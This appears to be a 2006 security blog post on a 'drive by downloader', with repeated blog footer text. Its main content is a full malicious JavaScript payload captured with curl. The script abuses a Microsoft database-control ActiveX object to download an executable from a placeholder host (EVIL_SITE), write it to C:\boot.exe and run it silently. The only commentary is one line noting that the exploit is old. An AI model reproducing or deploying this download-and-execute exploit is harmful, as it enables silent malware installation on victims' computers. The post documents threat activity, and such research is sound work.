Zeroday 01100100011010010

another variation of drive by downloaders

The exploit used is fairly old. One other important thing to note is that the CLSID used here is a Microsoft database control.

[zero@day testing]$ curl http://EVIL_SITE/db/wm.htm <script> var url,path; url="http://EVIL_SITE/mc/game/db.exe"; path="C:\\boot.exe"; try{ var ado=(document.createElement("object")); var d=1; ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"); var e=1; var xml=ado.CreateObject("Microsoft.XMLHTTP",""); var f=1; var ab="Adodb."; var cd="Stream"; var g=1; var as=ado.createobject(ab+cd,""); var h=1; xml.Open("GET",url,0); xml.Send(); as.type=1; var n=1; as.open(); as.write(xml.responseBody); as.savetofile(path,2); as.close(); var shell=ado.createobject("Shell.Application",""); shell.ShellExecute(path,"","","open",0); } catch(e){} ;</script>

This entry was posted on Sunday, December 24th, 2006 at 9:41 AM and filed under Digital Warfare, Vulnerabilities.
Follow comments here with the RSS 2.0 (XML) feed. Post a comment or leave a trackback.

follow me on Twitter @zeroday

another variation of drive by downloaders

This entry was posted on Sunday, December 24th, 2006 at 9:41 AM and filed under Digital Warfare, Vulnerabilities.
Follow comments here with the RSS 2.0 (XML) feed. Post a comment or leave a trackback.

Post a Comment

Zeroday 01100100011010010

follow me on Twitter @zeroday

another variation of drive by downloaders

This entry was posted on Sunday, December 24th, 2006 at 9:41 AM and filed under Digital Warfare, Vulnerabilities. Follow comments here with the RSS 2.0 (XML) feed. Post a comment or leave a trackback.

Post a Comment

This entry was posted on Sunday, December 24th, 2006 at 9:41 AM and filed under Digital Warfare, Vulnerabilities.
Follow comments here with the RSS 2.0 (XML) feed. Post a comment or leave a trackback.